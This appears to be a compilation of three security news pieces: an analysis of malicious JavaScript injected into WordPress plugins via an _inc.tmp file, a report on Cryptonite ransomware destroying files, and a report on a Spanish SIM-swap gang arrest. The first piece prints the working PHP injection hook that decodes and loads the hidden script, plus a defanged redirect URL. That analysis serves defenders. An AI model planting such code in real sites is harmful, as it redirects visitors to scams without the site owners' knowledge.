The spam website was resolving to an IP address https://urlscan.io/ip/45.133.44.20 employed by a shady ad network mainly used for porn websites.

An inspection of the compromised web page revealed a malicious JavaScript injection as the source of the redirect, which had been injected into random plugin files on the compromised website.

Malicious JavaScript injected into WordPress plugins via _inc.tmp

As it turns out, our remediation teams have recently noticed an influx of tickets for WordPress websites that have the following code injected into random plugins:

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
        {
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
        }
    }

This PHP code injects the decoded contents of _inc.tmp (found in the same plugin directory) into the header section of the site’s WordPress pages.

To accomplish this, it adds the get_hex_cache function to the wp_head hook. This hook is only added once, even when more than one plugin is infected. It’s also worth noting that the malware is not activated for site administrators.

The _inc.tmp file contains a 51Kb-long sequence of digits:

The _inc.tmp file containing 51Kb-long sequence of digits:

It’s a hexadecimally encoded binary string. The malware appends 3c7 at the beginning of the string and decodes using the hex2bin PHP function.

The decoded results contain a <script> tag populated with obfuscated JavaScript code, which is injected into WordPress pages.

Example of the injected malicious JavaScript
Example of the injected script

The code begins with “function _0x18b4(){const _0x188f70=”. And yet another interesting feature of this injection is the data-group=”lists” parameter of the script tag. A quick check with PublicWWW revealed over 170 websites infected with this particular piece of malware (at the time of writing).

Furthermore, the script adds a listener to the whole page’s onclick event. Whenever a site visitor clicks on any link, it changes the link to hxxps://1.guesswhatnews[.]com/not-a-robot/index.html?var=siteid&ymid=clickid&rc=0&mrc=3&fsc=0&zoneid=1947429&tbz=1947431

Evading detection from dev tools

To hide the malicious activity from prying eyes, the script doesn’t do anything if it detects open Developer Tools. We’ve seen this behavior quite often in MageCart malware, however this script uses a more complex approach to detecting dev tools which relies on multiple alternative methods.

Here is a list of some of the function names this malware uses to make these checks:

  • checkByImageMethod
  • checkDevByScreenResize
  • detectDevByKeyboard
  • checkByFirebugMethod
  • checkByProfileMethod
Malware detects developer tools

Whenever the malware detects that dev tools are enabled, then the redirect doesn’t occur and malicious behavior is much harder to find upon inspection.

Mitigation Steps

Obfuscation can make it challenging for website owners to detect or pinpoint the source of malicious behavior on their website. Fortunately, a number of free and paid tools exist to help monitor for indicators of compromise.

Let’s take a look at some of the ways you can mitigate risk of infection for your website.

  • Scan your website for malware regularly and keep an eye out for infections at both the client and server level.
  • Install the latest software updates and patches for your website as soon as they become available. That includes core CMS, plugins, themes, and other extensible components.
  • Leverage a web application firewall to virtually patch known vulnerabilities, block bad bots, and mitigate brute force attacks.
  • Harden your website by restricting access to admin pages and using strong, unique passwords for all of your website’s accounts.
  • Use file integrity monitoring to detect any unexpected changes in your environment.

Source: https://blog.sucuri.net/2022/12/infected-wordpress-plugins-redirect-to-push-notification-scam.html

This broken ransomware can’t decrypt your files, even if you pay the ransom

Researchers warn this badly built ransomware will destroy your files, so don’t pay up.

Victims of a recently uncovered form of ransomware are being warned not to pay the ransom demand, simply because the ransomware isn’t able to decrypt files – it just destroys them instead. 

Coded in Python, Cryptonite ransomware first appeared in October as part of a free-to-download open-source toolkit – available to anyone with the skills required to deploy it in attacks against Microsoft Windows systems, with phishing attacks believed to be the most common means of delivery.

But analysis of Cryptonite by cybersecurity researchers at Fortinet has found that the ransomware only has “barebones” functionality and doesn’t offer a means of decrypting files at all, even if a ransom payment is made. 

Instead, Cryptonite effectively acts as wiper malware, destroying the encrypted files, leaving no way of retrieving the data. 

But rather than this being an intentionally malicious act of destruction by design, researchers suggest that the reason Cryptonite does this is because the ransomware has been poorly put together.  

A basic design and what’s described as a “lack of quality assurance” means the ransomware doesn’t work correctly because a flaw in the way it’s been put together means if Cryptonite crashes or is just closed, it leaves no way to recover encrypted files. 

There’s also no way to run it in decryption-only mode – so every time the ransomware is run, it re-encrypts everything with a different key. This means that, even if there was a way to recover the files, the unique key probably wouldn’t work – leaving no way to recover the encrypted data. 

“This sample demonstrates how a ransomware’s weak architecture and programming can quickly turn it into a wiper that does not allow data recovery,” said Gergely Révay, security researcher at Fortinet’s FortiGuard Labs. 

“Although we often complain about the increasing sophistication of ransomware samples, we can also see that oversimplicity and a lack of quality assurance can also lead to significant problems,” he added. 

It’s the victim of the ransomware attack that feels those problems, as they’re left with no means of restoring their network – even if they’ve made a ransom payment.  

The case of Cryptonite ransomware also serves as a reminder that paying a ransom is never a guarantee that the cyber criminals will provide a decryption key, or if it will work properly.   

Cyber agencies, including CISA, the FBI and the NCSC, recommend against paying the ransom because it only serves to embolden and encourage cyber criminals, particularly if they can acquire ransomware at a low cost or for free. 

The slightly good news is that it’s now harder for wannabe cyber criminals to get their hands on Cryptonite, as the original source code has been removed from GitHub. 

In addition to this, the simple nature of the ransomware also means that it’s easy for antivirus software to detect – so it’s recommended antivirus software is installed and kept up to date. 

Source: https://www.zdnet.com/article/this-badly-made-ransomware-cant-decrypt-your-files-even-if-you-pay-the-ransom/

Police arrest 55 members of ‘Black Panthers’ SIM Swap gang

The Spanish National Police have arrested 55 members of the ‘Black Panthers’ cybercrime group, including one of the organization’s leaders based in Barcelona.

The gang was operating four specialized activity cells dedicated to social engineering, vishing (voice phishing), phishing, and carding, having a very organized structure.

The arrested leader coordinated the cells and recruited new members and money mules.

“The criminal group consisted of a network structure, made up of interconnected and perfectly defined action cells, whose division of tasks dealt with knowledge, accessibility to stolen information, and experience,” reads the police’s announcement.

The ultimate goal of the gang was to perform SIM swapping attacks, which is to port a target’s phone number to the attacker’s device. By porting the number, the attackers now gain access to the victim’s text messages and can use it to bypass 2FA protection on their bank accounts and empty them.

For the SIM swapping, the fraudsters used a combination of phishing, vishing, and call forwarding to impersonate the identities of their targets when talking to mobile service provider customer support agents.

In some cases, the scammers even acted as service technicians for local reseller offices of the targeted telecom firms, stealing the account credentials of their employees.

“This gave them access to the database of the telephone operators themselves and allowed them to obtain the personal data of the victims, making duplicate SIM cards themselves.” – Policía National.

Once they got access to the bank accounts of their targets, they made multiple transfers to a network of “money mules” located on the Levantine coast.

According to the investigators’ estimates, ‘Black Panthers’ managed to defraud at least 100 victims before their arrest, stealing 250,000 euros ($260,000) in the process.

The police’s investigation also revealed that the ‘Black Panther’ gang had an active presence on the dark web, where their “carding” cell bought ID and credit card numbers using cryptocurrency.

The crooks used the purchased info to buy various luxury products from online shops and then resell them as second-hand items to unsuspecting buyers, effectively laundering the money.

During the police raids in seven homes, 45 SIM cards, 11 mobile phones, four laptops, a hardware cryptocurrency wallet, and plenty of documentation relating to the crimes were found and confiscated.

Source: Police arrest 55 members of ‘Black Panthers’ SIM Swap gang (bleepingcomputer.com)